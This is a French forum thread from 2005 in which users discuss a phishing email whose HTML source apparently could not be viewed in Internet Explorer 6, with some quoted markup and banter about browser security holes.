</tr>
</table>
</td>
</tr>
</table>
</td>

<td width="25" height="100%"><img src="line_rih.gif" height="100%"
width="25"></td>
</tr>
</table>

<head>
<meta http-equiv="pragma" content="no-cache">
</head>
</body>
</html>



--
Emmanuel
The C-FAQ: http://www.eskimo.com/~scs/C-faq/faq.html
The C-library: http://www.dinkumware.com/refxc.html

"Clearly your code does not meet the original spec."
"You are sentenced to 30 lashes with a wet noodle."
-- Jerry Coffin in a.l.c.c++

Roland Garcia

05/02/2005 à 18:03

Bravo, j'ai bien dit: sous IE6!!! Est ce que c'est ce que vous avez fait?
Car a priori seul ce navigateur semble comporter une vulnérabilité à ce trou
de sécurité....

Vous êtes d'une originalité.... :)

--
Roland Garcia

P.C.

05/02/2005 à 18:04

"Emmanuel Delahaye" a écrit dans le message de
news:

P.C. wrote on 03/02/05 :

je vous défie de regarder le code html du fichier avec la fonction view
source (ou au clic droit de la souris)! Enfin, sous IE6.
...

Et voilà:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<script language="JavaScript" type="text/JavaScript">
<!--

...

Bravo, j'ai bien dit: sous IE6!!! Est ce que c'est ce que vous avez fait?
Car a priori seul ce navigateur semble comporter une vulnérabilité à ce trou
de sécurité, d'apres les autres réponses que j'ai pu lire... Enfin, comme
dit Monsieur Momie, on va pas passer l'année là dessus. Cependant j'ai déjà
reçu un meme genre de mail de phishing pour une autre banque aujourd hui,
utilisant le même systeme.

P.C.

09/02/2005 à 19:17

"Roland Garcia" a écrit dans le message de
news:

Bravo, j'ai bien dit: sous IE6!!! Est ce que c'est ce que vous avez
fait?

Car a priori seul ce navigateur semble comporter une vulnérabilité à ce
trou

de sécurité....

Vous êtes d'une originalité.... :)

C'est à dire que les autres navigateurs possedent aussi des trous de
sécurité, mais personne ne les connait vu qu'il n'y a aucun intéret a les
exploiter. En tout cas, pas pour le moment.

Une ruse de pirate

10 réponses

Veuillez sélectionner un problème